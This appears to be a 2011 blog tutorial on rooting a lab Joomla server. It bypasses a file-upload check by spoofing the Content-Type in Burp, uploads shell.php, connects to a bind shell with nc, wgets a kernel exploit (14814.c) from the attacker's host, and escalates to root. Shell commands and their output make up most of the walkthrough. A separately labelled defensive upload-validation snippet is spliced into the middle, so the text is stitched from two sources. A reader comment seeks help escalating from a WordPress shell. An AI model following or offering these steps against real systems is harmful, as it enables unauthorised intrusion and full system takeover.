Thursday, 28 July 2011


The risk from web vulnerabilities is very high: a malicious user can use such a vulnerability to get root on the system, and as the root user we can do whatever we want. So,

I will explain how to get root through a web application. I recommend building your own lab because it is safer to learn that way. Let's start...!!!

First, we pick the web target, for example: http://10.42.43.18/joomla. The vulnerabilities in this web application are LFI (local file inclusion) and file upload. I will use the file upload vulnerability.

I try to upload my shell to the web application, but my attempt fails.


OK, now I will use Burp Suite to intercept the request and change the file type of my shell to image/jpeg, because the only allowed file type is image.

Result:


Now I try to access my shell, which has been uploaded to http://10.42.43.18/joomla/images/shell.php
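The upload succeeded because the application trusted the Content-Type sent by the client. The following server-side check is an added example, not code from the original post or from Joomla; the function name, allowlist and sample requests are assumptions for illustration. It ignores the declared type and decides on the extension and file signature instead.

```python
import os
import secrets

# Extension allowlist mapped to the file signatures (magic bytes) it must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename, declared_type, data):
    """Decide whether an upload may be stored; returns (ok, stored_name_or_reason).

    declared_type is the Content-Type of the multipart part. The client sets it,
    so it is accepted as a parameter only to show that it plays no role here.
    """
    # Keep only the last path component, whatever separator the client used.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if "\x00" in base or ext not in ALLOWED:
        return False, "extension not allowed: %r" % ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content is not a valid %s file" % ext
    # Server-chosen name: drops the client's name and any inner ".php" part.
    return True, secrets.token_hex(16) + ext


# Constructed sample requests (not captured traffic).
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
SAMPLES = [
    ("shell.php", "image/jpeg", b"<?php /* placeholder */ ?>"),
    ("shell.php.jpg", "image/jpeg", b"<?php /* placeholder */ ?>"),
    ("photo.JPG", "application/octet-stream", JPEG_HEADER + b"\x00" * 32),
]

if __name__ == "__main__":
    for name, ctype, body in SAMPLES:
        print(name, ctype, validate_upload(name, ctype, body))
```

Content checks are one layer only: the upload directory should also be configured so that the web server never executes scripts from it.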


Now I can connect to the target through the bind shell backdoor, using the command:

root@virtual:/home/victim# nc 10.42.43.18 11457
bash: no job control in this shell

www-data@victim:/var/www/joomla/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@victim:/var/www/joomla/images$ uname -a
uname -a
Linux victim 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux

 
I am connected, but the id is not yet root. I know that kernel 2.6.32 is vulnerable to a local exploit; you can download the exploit here

www-data@victim:/var/www/joomla/images$ wget http://10.42.43.1/14814.c   
wget http://10.42.43.1/14814.c   
--2011-07-29 05:29:42--  http://10.42.43.1/14814.c
Connecting to 10.42.43.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15610 (15K) [text/x-csrc]
Saving to: `14814.c.1'

     0K .......... .....                                      100% 31.4M=0s

2011-07-29 05:29:42 (31.4 MB/s) - `14814.c.1' saved [15610/15610]

www-data@victim:/var/www/joomla/images$ ./local-exploit
./local-exploit
id
uid=0(root) gid=0(root)
su
id
uid=0(root) gid=0(root) groups=0(root)


Bingo...!!!
Now we are root on the system.

<:::I am sorry if there are mistakes in my writing, because my English is very bad:::>

1 comment:

Anonymous said...

hello,

I have downloaded the script and copied it to the victim machine; however, it produced about 8 lines of errors

./license.c: 1: WordPress: not found
: not found: 2:
./license.c: 3: Copyright: not found
: not found: 4:
./license.c: 5: This: not found
./license.c: 5: you: not found
./license.c: 6: it: not found
./license.c: 7: the: not found
./license.c: 7: either: not found
./license.c: 8: Syntax error: word unexpected

Any suggestion, so I have shell access through uploading theme in WP but not root access.

Cheers
Ohanes
